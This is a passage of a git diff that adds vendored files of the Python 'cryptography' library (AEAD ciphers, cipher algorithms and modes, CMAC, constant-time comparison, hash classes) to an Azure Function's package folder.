Max 2**31 - 1 bytes" + ) + + self._check_params(nonce, data, associated_data) + return aead._encrypt(backend, self, nonce, data, [associated_data], 16) + + def decrypt( + self, + nonce: bytes, + data: bytes, + associated_data: typing.Optional[bytes], + ) -> bytes: + if associated_data is None: + associated_data = b"" + + self._check_params(nonce, data, associated_data) + return aead._decrypt(backend, self, nonce, data, [associated_data], 16) + + def _check_params( + self, + nonce: bytes, + data: bytes, + associated_data: bytes, + ) -> None: + utils._check_byteslike("nonce", nonce) + utils._check_bytes("data", data) + utils._check_bytes("associated_data", associated_data) + if len(nonce) < 8 or len(nonce) > 128: + raise ValueError("Nonce must be between 8 and 128 bytes") + + +class AESOCB3: + _MAX_SIZE = 2**31 - 1 + + def __init__(self, key: bytes): + utils._check_byteslike("key", key) + if len(key) not in (16, 24, 32): + raise ValueError("AESOCB3 key must be 128, 192, or 256 bits.") + + self._key = key + + if not backend.aead_cipher_supported(self): + raise exceptions.UnsupportedAlgorithm( + "OCB3 is not supported by this version of OpenSSL", + exceptions._Reasons.UNSUPPORTED_CIPHER, + ) + + @classmethod + def generate_key(cls, bit_length: int) -> bytes: + if not isinstance(bit_length, int): + raise TypeError("bit_length must be an integer") + + if bit_length not in (128, 192, 256): + raise ValueError("bit_length must be 128, 192, or 256") + + return os.urandom(bit_length // 8) + + def encrypt( + self, + nonce: bytes, + data: bytes, + associated_data: typing.Optional[bytes], + ) -> bytes: + if associated_data is None: + associated_data = b"" + + if len(data) > self._MAX_SIZE or len(associated_data) > self._MAX_SIZE: + # This is OverflowError to match what cffi would raise + raise OverflowError( + "Data or associated data too long. 
Max 2**31 - 1 bytes" + ) + + self._check_params(nonce, data, associated_data) + return aead._encrypt(backend, self, nonce, data, [associated_data], 16) + + def decrypt( + self, + nonce: bytes, + data: bytes, + associated_data: typing.Optional[bytes], + ) -> bytes: + if associated_data is None: + associated_data = b"" + + self._check_params(nonce, data, associated_data) + return aead._decrypt(backend, self, nonce, data, [associated_data], 16) + + def _check_params( + self, + nonce: bytes, + data: bytes, + associated_data: bytes, + ) -> None: + utils._check_byteslike("nonce", nonce) + utils._check_bytes("data", data) + utils._check_bytes("associated_data", associated_data) + if len(nonce) < 12 or len(nonce) > 15: + raise ValueError("Nonce must be between 12 and 15 bytes") + + +class AESSIV(object): + _MAX_SIZE = 2**31 - 1 + + def __init__(self, key: bytes): + utils._check_byteslike("key", key) + if len(key) not in (32, 48, 64): + raise ValueError("AESSIV key must be 256, 384, or 512 bits.") + + self._key = key + + if not backend.aead_cipher_supported(self): + raise exceptions.UnsupportedAlgorithm( + "AES-SIV is not supported by this version of OpenSSL", + exceptions._Reasons.UNSUPPORTED_CIPHER, + ) + + @classmethod + def generate_key(cls, bit_length: int) -> bytes: + if not isinstance(bit_length, int): + raise TypeError("bit_length must be an integer") + + if bit_length not in (256, 384, 512): + raise ValueError("bit_length must be 256, 384, or 512") + + return os.urandom(bit_length // 8) + + def encrypt( + self, + data: bytes, + associated_data: typing.Optional[typing.List[bytes]], + ) -> bytes: + if associated_data is None: + associated_data = [] + + self._check_params(data, associated_data) + + if len(data) > self._MAX_SIZE or any( + len(ad) > self._MAX_SIZE for ad in associated_data + ): + # This is OverflowError to match what cffi would raise + raise OverflowError( + "Data or associated data too long. Max 2**31 - 1 bytes" + ) + + return aead._encrypt(backend, self, b"", data, associated_data, 16) + + def decrypt( + self, + data: bytes, + associated_data: typing.Optional[typing.List[bytes]], + ) -> bytes: + if associated_data is None: + associated_data = [] + + self._check_params(data, associated_data) + + return aead._decrypt(backend, self, b"", data, associated_data, 16) + + def _check_params( + self, + data: bytes, + associated_data: typing.List, + ) -> None: + utils._check_bytes("data", data) + if not isinstance(associated_data, list) or not all( + isinstance(x, bytes) for x in associated_data + ): + raise TypeError("associated_data must be a list of bytes or None") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/algorithms.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/algorithms.py new file mode 100644 index 0000000..8db40fa --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/algorithms.py @@ -0,0 +1,207 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
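All of the AEAD classes in aead.py above follow the same encrypt(nonce, data, associated_data) shape; a minimal AESGCM round trip as a hedged sketch (not part of the vendored code):

import os

from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = AESGCM.generate_key(bit_length=256)
aesgcm = AESGCM(key)
nonce = os.urandom(12)  # 96-bit nonces are the conventional GCM choice

# associated_data is authenticated but not encrypted; the identical value
# must be presented on decrypt or InvalidTag is raised.
ciphertext = aesgcm.encrypt(nonce, b"secret payload", b"header")
assert aesgcm.decrypt(nonce, ciphertext, b"header") == b"secret payload"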
+ + +from cryptography import utils +from cryptography.hazmat.primitives.ciphers import ( + BlockCipherAlgorithm, + CipherAlgorithm, +) + + +def _verify_key_size(algorithm: CipherAlgorithm, key: bytes) -> bytes: + # Verify that the key is instance of bytes + utils._check_byteslike("key", key) + + # Verify that the key size matches the expected key size + if len(key) * 8 not in algorithm.key_sizes: + raise ValueError( + "Invalid key size ({}) for {}.".format( + len(key) * 8, algorithm.name + ) + ) + return key + + +class AES(CipherAlgorithm, BlockCipherAlgorithm): + name = "AES" + block_size = 128 + # 512 added to support AES-256-XTS, which uses 512-bit keys + key_sizes = frozenset([128, 192, 256, 512]) + + def __init__(self, key: bytes): + self.key = _verify_key_size(self, key) + + @property + def key_size(self) -> int: + return len(self.key) * 8 + + +class Camellia(CipherAlgorithm, BlockCipherAlgorithm): + name = "camellia" + block_size = 128 + key_sizes = frozenset([128, 192, 256]) + + def __init__(self, key: bytes): + self.key = _verify_key_size(self, key) + + @property + def key_size(self) -> int: + return len(self.key) * 8 + + +class TripleDES(CipherAlgorithm, BlockCipherAlgorithm): + name = "3DES" + block_size = 64 + key_sizes = frozenset([64, 128, 192]) + + def __init__(self, key: bytes): + if len(key) == 8: + key += key + key + elif len(key) == 16: + key += key[:8] + self.key = _verify_key_size(self, key) + + @property + def key_size(self) -> int: + return len(self.key) * 8 + + +class Blowfish(CipherAlgorithm, BlockCipherAlgorithm): + name = "Blowfish" + block_size = 64 + key_sizes = frozenset(range(32, 449, 8)) + + def __init__(self, key: bytes): + self.key = _verify_key_size(self, key) + + @property + def key_size(self) -> int: + return len(self.key) * 8 + + +_BlowfishInternal = Blowfish +utils.deprecated( + Blowfish, + __name__, + "Blowfish has been deprecated", + utils.DeprecatedIn37, + name="Blowfish", +) + + +class CAST5(CipherAlgorithm, BlockCipherAlgorithm): + name = "CAST5" + block_size = 64 + key_sizes = frozenset(range(40, 129, 8)) + + def __init__(self, key: bytes): + self.key = _verify_key_size(self, key) + + @property + def key_size(self) -> int: + return len(self.key) * 8 + + +_CAST5Internal = CAST5 +utils.deprecated( + CAST5, + __name__, + "CAST5 has been deprecated", + utils.DeprecatedIn37, + name="CAST5", +) + + +class ARC4(CipherAlgorithm): + name = "RC4" + key_sizes = frozenset([40, 56, 64, 80, 128, 160, 192, 256]) + + def __init__(self, key: bytes): + self.key = _verify_key_size(self, key) + + @property + def key_size(self) -> int: + return len(self.key) * 8 + + +class IDEA(CipherAlgorithm, BlockCipherAlgorithm): + name = "IDEA" + block_size = 64 + key_sizes = frozenset([128]) + + def __init__(self, key: bytes): + self.key = _verify_key_size(self, key) + + @property + def key_size(self) -> int: + return len(self.key) * 8 + + +_IDEAInternal = IDEA +utils.deprecated( + IDEA, + __name__, + "IDEA has been deprecated", + utils.DeprecatedIn37, + name="IDEA", +) + + +class SEED(CipherAlgorithm, BlockCipherAlgorithm): + name = "SEED" + block_size = 128 + key_sizes = frozenset([128]) + + def __init__(self, key: bytes): + self.key = _verify_key_size(self, key) + + @property + def key_size(self) -> int: + return len(self.key) * 8 + + +_SEEDInternal = SEED +utils.deprecated( + SEED, + __name__, + "SEED has been deprecated", + utils.DeprecatedIn37, + name="SEED", +) + + +class ChaCha20(CipherAlgorithm): + name = "ChaCha20" + key_sizes = frozenset([256]) + + def 
__init__(self, key: bytes, nonce: bytes): + self.key = _verify_key_size(self, key) + utils._check_byteslike("nonce", nonce) + + if len(nonce) != 16: + raise ValueError("nonce must be 128-bits (16 bytes)") + + self._nonce = nonce + + @property + def nonce(self) -> bytes: + return self._nonce + + @property + def key_size(self) -> int: + return len(self.key) * 8 + + +class SM4(CipherAlgorithm, BlockCipherAlgorithm): + name = "SM4" + block_size = 128 + key_sizes = frozenset([128]) + + def __init__(self, key: bytes): + self.key = _verify_key_size(self, key) + + @property + def key_size(self) -> int: + return len(self.key) * 8 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/base.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/base.py new file mode 100644 index 0000000..67af497 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/base.py @@ -0,0 +1,269 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc +import typing + +from cryptography.exceptions import ( + AlreadyFinalized, + AlreadyUpdated, + NotYetFinalized, +) +from cryptography.hazmat.primitives._cipheralgorithm import CipherAlgorithm +from cryptography.hazmat.primitives.ciphers import modes + + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.ciphers import ( + _CipherContext as _BackendCipherContext, + ) + + +class CipherContext(metaclass=abc.ABCMeta): + @abc.abstractmethod + def update(self, data: bytes) -> bytes: + """ + Processes the provided bytes through the cipher and returns the results + as bytes. + """ + + @abc.abstractmethod + def update_into(self, data: bytes, buf: bytes) -> int: + """ + Processes the provided bytes and writes the resulting data into the + provided buffer. Returns the number of bytes written. + """ + + @abc.abstractmethod + def finalize(self) -> bytes: + """ + Returns the results of processing the final block as bytes. + """ + + +class AEADCipherContext(CipherContext, metaclass=abc.ABCMeta): + @abc.abstractmethod + def authenticate_additional_data(self, data: bytes) -> None: + """ + Authenticates the provided bytes. + """ + + +class AEADDecryptionContext(AEADCipherContext, metaclass=abc.ABCMeta): + @abc.abstractmethod + def finalize_with_tag(self, tag: bytes) -> bytes: + """ + Returns the results of processing the final block as bytes and allows + delayed passing of the authentication tag. + """ + + +class AEADEncryptionContext(AEADCipherContext, metaclass=abc.ABCMeta): + @abc.abstractproperty + def tag(self) -> bytes: + """ + Returns tag bytes. This is only available after encryption is + finalized. + """ + + +Mode = typing.TypeVar( + "Mode", bound=typing.Optional[modes.Mode], covariant=True +) + + +class Cipher(typing.Generic[Mode]): + def __init__( + self, + algorithm: CipherAlgorithm, + mode: Mode, + backend: typing.Any = None, + ): + + if not isinstance(algorithm, CipherAlgorithm): + raise TypeError("Expected interface of CipherAlgorithm.") + + if mode is not None: + # mypy needs this assert to narrow the type from our generic + # type. Maybe it won't some time in the future. 
+ assert isinstance(mode, modes.Mode) + mode.validate_for_algorithm(algorithm) + + self.algorithm = algorithm + self.mode = mode + + @typing.overload + def encryptor( + self: "Cipher[modes.ModeWithAuthenticationTag]", + ) -> AEADEncryptionContext: + ... + + @typing.overload + def encryptor( + self: "_CIPHER_TYPE", + ) -> CipherContext: + ... + + def encryptor(self): + if isinstance(self.mode, modes.ModeWithAuthenticationTag): + if self.mode.tag is not None: + raise ValueError( + "Authentication tag must be None when encrypting." + ) + from cryptography.hazmat.backends.openssl.backend import backend + + ctx = backend.create_symmetric_encryption_ctx( + self.algorithm, self.mode + ) + return self._wrap_ctx(ctx, encrypt=True) + + @typing.overload + def decryptor( + self: "Cipher[modes.ModeWithAuthenticationTag]", + ) -> AEADDecryptionContext: + ... + + @typing.overload + def decryptor( + self: "_CIPHER_TYPE", + ) -> CipherContext: + ... + + def decryptor(self): + from cryptography.hazmat.backends.openssl.backend import backend + + ctx = backend.create_symmetric_decryption_ctx( + self.algorithm, self.mode + ) + return self._wrap_ctx(ctx, encrypt=False) + + def _wrap_ctx( + self, ctx: "_BackendCipherContext", encrypt: bool + ) -> typing.Union[ + AEADEncryptionContext, AEADDecryptionContext, CipherContext + ]: + if isinstance(self.mode, modes.ModeWithAuthenticationTag): + if encrypt: + return _AEADEncryptionContext(ctx) + else: + return _AEADDecryptionContext(ctx) + else: + return _CipherContext(ctx) + + +_CIPHER_TYPE = Cipher[ + typing.Union[ + modes.ModeWithNonce, + modes.ModeWithTweak, + None, + modes.ECB, + modes.ModeWithInitializationVector, + ] +] + + +class _CipherContext(CipherContext): + _ctx: typing.Optional["_BackendCipherContext"] + + def __init__(self, ctx: "_BackendCipherContext") -> None: + self._ctx = ctx + + def update(self, data: bytes) -> bytes: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + return self._ctx.update(data) + + def update_into(self, data: bytes, buf: bytes) -> int: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + return self._ctx.update_into(data, buf) + + def finalize(self) -> bytes: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + data = self._ctx.finalize() + self._ctx = None + return data + + +class _AEADCipherContext(AEADCipherContext): + _ctx: typing.Optional["_BackendCipherContext"] + _tag: typing.Optional[bytes] + + def __init__(self, ctx: "_BackendCipherContext") -> None: + self._ctx = ctx + self._bytes_processed = 0 + self._aad_bytes_processed = 0 + self._tag = None + self._updated = False + + def _check_limit(self, data_size: int) -> None: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + self._updated = True + self._bytes_processed += data_size + if self._bytes_processed > self._ctx._mode._MAX_ENCRYPTED_BYTES: + raise ValueError( + "{} has a maximum encrypted byte limit of {}".format( + self._ctx._mode.name, self._ctx._mode._MAX_ENCRYPTED_BYTES + ) + ) + + def update(self, data: bytes) -> bytes: + self._check_limit(len(data)) + # mypy needs this assert even though _check_limit already checked + assert self._ctx is not None + return self._ctx.update(data) + + def update_into(self, data: bytes, buf: bytes) -> int: + self._check_limit(len(data)) + # mypy needs this assert even though _check_limit already checked + assert self._ctx is not None + return self._ctx.update_into(data, buf) + + def finalize(self) -> 
bytes: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + data = self._ctx.finalize() + self._tag = self._ctx.tag + self._ctx = None + return data + + def authenticate_additional_data(self, data: bytes) -> None: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + if self._updated: + raise AlreadyUpdated("Update has been called on this context.") + + self._aad_bytes_processed += len(data) + if self._aad_bytes_processed > self._ctx._mode._MAX_AAD_BYTES: + raise ValueError( + "{} has a maximum AAD byte limit of {}".format( + self._ctx._mode.name, self._ctx._mode._MAX_AAD_BYTES + ) + ) + + self._ctx.authenticate_additional_data(data) + + +class _AEADDecryptionContext(_AEADCipherContext, AEADDecryptionContext): + def finalize_with_tag(self, tag: bytes) -> bytes: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + data = self._ctx.finalize_with_tag(tag) + self._tag = self._ctx.tag + self._ctx = None + return data + + +class _AEADEncryptionContext(_AEADCipherContext, AEADEncryptionContext): + @property + def tag(self) -> bytes: + if self._ctx is not None: + raise NotYetFinalized( + "You must finalize encryption before " "getting the tag." + ) + assert self._tag is not None + return self._tag diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/modes.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/modes.py new file mode 100644 index 0000000..65a61a5 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/modes.py @@ -0,0 +1,263 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc +import typing + +from cryptography import utils +from cryptography.exceptions import UnsupportedAlgorithm, _Reasons +from cryptography.hazmat.primitives._cipheralgorithm import ( + BlockCipherAlgorithm, + CipherAlgorithm, +) + + +class Mode(metaclass=abc.ABCMeta): + @abc.abstractproperty + def name(self) -> str: + """ + A string naming this mode (e.g. "ECB", "CBC"). + """ + + @abc.abstractmethod + def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: + """ + Checks that all the necessary invariants of this (mode, algorithm) + combination are met. + """ + + +class ModeWithInitializationVector(Mode, metaclass=abc.ABCMeta): + @abc.abstractproperty + def initialization_vector(self) -> bytes: + """ + The value of the initialization vector for this mode as bytes. + """ + + +class ModeWithTweak(Mode, metaclass=abc.ABCMeta): + @abc.abstractproperty + def tweak(self) -> bytes: + """ + The value of the tweak for this mode as bytes. + """ + + +class ModeWithNonce(Mode, metaclass=abc.ABCMeta): + @abc.abstractproperty + def nonce(self) -> bytes: + """ + The value of the nonce for this mode as bytes. + """ + + +class ModeWithAuthenticationTag(Mode, metaclass=abc.ABCMeta): + @abc.abstractproperty + def tag(self) -> typing.Optional[bytes]: + """ + The value of the tag supplied to the constructor of this mode. 
+ """ + + +def _check_aes_key_length(self: Mode, algorithm: CipherAlgorithm) -> None: + if algorithm.key_size > 256 and algorithm.name == "AES": + raise ValueError( + "Only 128, 192, and 256 bit keys are allowed for this AES mode" + ) + + +def _check_iv_length( + self: ModeWithInitializationVector, algorithm: BlockCipherAlgorithm +) -> None: + if len(self.initialization_vector) * 8 != algorithm.block_size: + raise ValueError( + "Invalid IV size ({}) for {}.".format( + len(self.initialization_vector), self.name + ) + ) + + +def _check_nonce_length( + nonce: bytes, name: str, algorithm: CipherAlgorithm +) -> None: + if not isinstance(algorithm, BlockCipherAlgorithm): + raise UnsupportedAlgorithm( + f"{name} requires a block cipher algorithm", + _Reasons.UNSUPPORTED_CIPHER, + ) + if len(nonce) * 8 != algorithm.block_size: + raise ValueError( + "Invalid nonce size ({}) for {}.".format(len(nonce), name) + ) + + +def _check_iv_and_key_length( + self: ModeWithInitializationVector, algorithm: CipherAlgorithm +) -> None: + if not isinstance(algorithm, BlockCipherAlgorithm): + raise UnsupportedAlgorithm( + f"{self} requires a block cipher algorithm", + _Reasons.UNSUPPORTED_CIPHER, + ) + _check_aes_key_length(self, algorithm) + _check_iv_length(self, algorithm) + + +class CBC(ModeWithInitializationVector): + name = "CBC" + + def __init__(self, initialization_vector: bytes): + utils._check_byteslike("initialization_vector", initialization_vector) + self._initialization_vector = initialization_vector + + @property + def initialization_vector(self) -> bytes: + return self._initialization_vector + + validate_for_algorithm = _check_iv_and_key_length + + +class XTS(ModeWithTweak): + name = "XTS" + + def __init__(self, tweak: bytes): + utils._check_byteslike("tweak", tweak) + + if len(tweak) != 16: + raise ValueError("tweak must be 128-bits (16 bytes)") + + self._tweak = tweak + + @property + def tweak(self) -> bytes: + return self._tweak + + def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: + if algorithm.key_size not in (256, 512): + raise ValueError( + "The XTS specification requires a 256-bit key for AES-128-XTS" + " and 512-bit key for AES-256-XTS" + ) + + +class ECB(Mode): + name = "ECB" + + validate_for_algorithm = _check_aes_key_length + + +class OFB(ModeWithInitializationVector): + name = "OFB" + + def __init__(self, initialization_vector: bytes): + utils._check_byteslike("initialization_vector", initialization_vector) + self._initialization_vector = initialization_vector + + @property + def initialization_vector(self) -> bytes: + return self._initialization_vector + + validate_for_algorithm = _check_iv_and_key_length + + +class CFB(ModeWithInitializationVector): + name = "CFB" + + def __init__(self, initialization_vector: bytes): + utils._check_byteslike("initialization_vector", initialization_vector) + self._initialization_vector = initialization_vector + + @property + def initialization_vector(self) -> bytes: + return self._initialization_vector + + validate_for_algorithm = _check_iv_and_key_length + + +class CFB8(ModeWithInitializationVector): + name = "CFB8" + + def __init__(self, initialization_vector: bytes): + utils._check_byteslike("initialization_vector", initialization_vector) + self._initialization_vector = initialization_vector + + @property + def initialization_vector(self) -> bytes: + return self._initialization_vector + + validate_for_algorithm = _check_iv_and_key_length + + +class CTR(ModeWithNonce): + name = "CTR" + + def __init__(self, nonce: bytes): + 
utils._check_byteslike("nonce", nonce) + self._nonce = nonce + + @property + def nonce(self) -> bytes: + return self._nonce + + def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: + _check_aes_key_length(self, algorithm) + _check_nonce_length(self.nonce, self.name, algorithm) + + +class GCM(ModeWithInitializationVector, ModeWithAuthenticationTag): + name = "GCM" + _MAX_ENCRYPTED_BYTES = (2**39 - 256) // 8 + _MAX_AAD_BYTES = (2**64) // 8 + + def __init__( + self, + initialization_vector: bytes, + tag: typing.Optional[bytes] = None, + min_tag_length: int = 16, + ): + # OpenSSL 3.0.0 constrains GCM IVs to [64, 1024] bits inclusive + # This is a sane limit anyway so we'll enforce it here. + utils._check_byteslike("initialization_vector", initialization_vector) + if len(initialization_vector) < 8 or len(initialization_vector) > 128: + raise ValueError( + "initialization_vector must be between 8 and 128 bytes (64 " + "and 1024 bits)." + ) + self._initialization_vector = initialization_vector + if tag is not None: + utils._check_bytes("tag", tag) + if min_tag_length < 4: + raise ValueError("min_tag_length must be >= 4") + if len(tag) < min_tag_length: + raise ValueError( + "Authentication tag must be {} bytes or longer.".format( + min_tag_length + ) + ) + self._tag = tag + self._min_tag_length = min_tag_length + + @property + def tag(self) -> typing.Optional[bytes]: + return self._tag + + @property + def initialization_vector(self) -> bytes: + return self._initialization_vector + + def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: + _check_aes_key_length(self, algorithm) + if not isinstance(algorithm, BlockCipherAlgorithm): + raise UnsupportedAlgorithm( + "GCM requires a block cipher algorithm", + _Reasons.UNSUPPORTED_CIPHER, + ) + block_size_bytes = algorithm.block_size // 8 + if self._tag is not None and len(self._tag) > block_size_bytes: + raise ValueError( + "Authentication tag cannot be more than {} bytes.".format( + block_size_bytes + ) + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/cmac.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/cmac.py new file mode 100644 index 0000000..1eaa814 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/cmac.py @@ -0,0 +1,66 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
+ + +import typing + +from cryptography import utils +from cryptography.exceptions import ( + AlreadyFinalized, +) +from cryptography.hazmat.primitives import ciphers + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.cmac import _CMACContext + + +class CMAC: + _ctx: typing.Optional["_CMACContext"] + _algorithm: ciphers.BlockCipherAlgorithm + + def __init__( + self, + algorithm: ciphers.BlockCipherAlgorithm, + backend: typing.Any = None, + ctx: typing.Optional["_CMACContext"] = None, + ): + if not isinstance(algorithm, ciphers.BlockCipherAlgorithm): + raise TypeError("Expected instance of BlockCipherAlgorithm.") + self._algorithm = algorithm + + if ctx is None: + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + self._ctx = ossl.create_cmac_ctx(self._algorithm) + else: + self._ctx = ctx + + def update(self, data: bytes) -> None: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + + utils._check_bytes("data", data) + self._ctx.update(data) + + def finalize(self) -> bytes: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + digest = self._ctx.finalize() + self._ctx = None + return digest + + def verify(self, signature: bytes) -> None: + utils._check_bytes("signature", signature) + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + + ctx, self._ctx = self._ctx, None + ctx.verify(signature) + + def copy(self) -> "CMAC": + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + return CMAC(self._algorithm, ctx=self._ctx.copy()) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/constant_time.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/constant_time.py new file mode 100644 index 0000000..3577ddb --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/constant_time.py @@ -0,0 +1,13 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import hmac + + +def bytes_eq(a: bytes, b: bytes) -> bool: + if not isinstance(a, bytes) or not isinstance(b, bytes): + raise TypeError("a and b must be bytes.") + + return hmac.compare_digest(a, b) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/hashes.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/hashes.py new file mode 100644 index 0000000..9dbdf2f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/hashes.py @@ -0,0 +1,259 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import abc +import typing + +from cryptography import utils +from cryptography.exceptions import ( + AlreadyFinalized, +) + + +class HashAlgorithm(metaclass=abc.ABCMeta): + @abc.abstractproperty + def name(self) -> str: + """ + A string naming this algorithm (e.g. "sha256", "md5"). + """ + + @abc.abstractproperty + def digest_size(self) -> int: + """ + The size of the resulting digest in bytes. 
+ """ + + @abc.abstractproperty + def block_size(self) -> typing.Optional[int]: + """ + The internal block size of the hash function, or None if the hash + function does not use blocks internally (e.g. SHA3). + """ + + +class HashContext(metaclass=abc.ABCMeta): + @abc.abstractproperty + def algorithm(self) -> HashAlgorithm: + """ + A HashAlgorithm that will be used by this context. + """ + + @abc.abstractmethod + def update(self, data: bytes) -> None: + """ + Processes the provided bytes through the hash. + """ + + @abc.abstractmethod + def finalize(self) -> bytes: + """ + Finalizes the hash context and returns the hash digest as bytes. + """ + + @abc.abstractmethod + def copy(self) -> "HashContext": + """ + Return a HashContext that is a copy of the current context. + """ + + +class ExtendableOutputFunction(metaclass=abc.ABCMeta): + """ + An interface for extendable output functions. + """ + + +class Hash(HashContext): + _ctx: typing.Optional[HashContext] + + def __init__( + self, + algorithm: HashAlgorithm, + backend: typing.Any = None, + ctx: typing.Optional["HashContext"] = None, + ): + if not isinstance(algorithm, HashAlgorithm): + raise TypeError("Expected instance of hashes.HashAlgorithm.") + self._algorithm = algorithm + + if ctx is None: + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + self._ctx = ossl.create_hash_ctx(self.algorithm) + else: + self._ctx = ctx + + @property + def algorithm(self) -> HashAlgorithm: + return self._algorithm + + def update(self, data: bytes) -> None: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + utils._check_byteslike("data", data) + self._ctx.update(data) + + def copy(self) -> "Hash": + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + return Hash(self.algorithm, ctx=self._ctx.copy()) + + def finalize(self) -> bytes: + if self._ctx is None: + raise AlreadyFinalized("Context was already finalized.") + digest = self._ctx.finalize() + self._ctx = None + return digest + + +class SHA1(HashAlgorithm): + name = "sha1" + digest_size = 20 + block_size = 64 + + +class SHA512_224(HashAlgorithm): # noqa: N801 + name = "sha512-224" + digest_size = 28 + block_size = 128 + + +class SHA512_256(HashAlgorithm): # noqa: N801 + name = "sha512-256" + digest_size = 32 + block_size = 128 + + +class SHA224(HashAlgorithm): + name = "sha224" + digest_size = 28 + block_size = 64 + + +class SHA256(HashAlgorithm): + name = "sha256" + digest_size = 32 + block_size = 64 + + +class SHA384(HashAlgorithm): + name = "sha384" + digest_size = 48 + block_size = 128 + + +class SHA512(HashAlgorithm): + name = "sha512" + digest_size = 64 + block_size = 128 + + +class SHA3_224(HashAlgorithm): # noqa: N801 + name = "sha3-224" + digest_size = 28 + block_size = None + + +class SHA3_256(HashAlgorithm): # noqa: N801 + name = "sha3-256" + digest_size = 32 + block_size = None + + +class SHA3_384(HashAlgorithm): # noqa: N801 + name = "sha3-384" + digest_size = 48 + block_size = None + + +class SHA3_512(HashAlgorithm): # noqa: N801 + name = "sha3-512" + digest_size = 64 + block_size = None + + +class SHAKE128(HashAlgorithm, ExtendableOutputFunction): + name = "shake128" + block_size = None + + def __init__(self, digest_size: int): + if not isinstance(digest_size, int): + raise TypeError("digest_size must be an integer") + + if digest_size < 1: + raise ValueError("digest_size must be a positive integer") + + self._digest_size = digest_size + + @property + def digest_size(self) -> int: + return 
self._digest_size + + +class SHAKE256(HashAlgorithm, ExtendableOutputFunction): + name = "shake256" + block_size = None + + def __init__(self, digest_size: int): + if not isinstance(digest_size, int): + raise TypeError("digest_size must be an integer") + + if digest_size < 1: + raise ValueError("digest_size must be a positive integer") + + self._digest_size = digest_size + + @property + def digest_size(self) -> int: + return self._digest_size + + +class MD5(HashAlgorithm): + name = "md5" + digest_size = 16 + block_size = 64 + + +class BLAKE2b(HashAlgorithm): + name = "blake2b" + _max_digest_size = 64 + _min_digest_size = 1 + block_size = 128 + + def __init__(self, digest_size: int): + + if digest_size != 64: + raise ValueError("Digest size must be 64") + + self._digest_size = digest_size + + @property + def digest_size(self) -> int: + return self._digest_size + + +class BLAKE2s(HashAlgorithm): + name = "blake2s" + block_size = 64 + _max_digest_size = 32 + _min_digest_size = 1 + + def __init__(self, digest_size: int): + + if digest_size != 32: + raise ValueError("Digest size must be 32") + + self._digest_size = digest_size + + @property + def digest_size(self) -> int: + return self._digest_size + + +class SM3(HashAlgorithm): + name = "sm3" + digest_size = 32 + block_size = 64 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/hmac.py 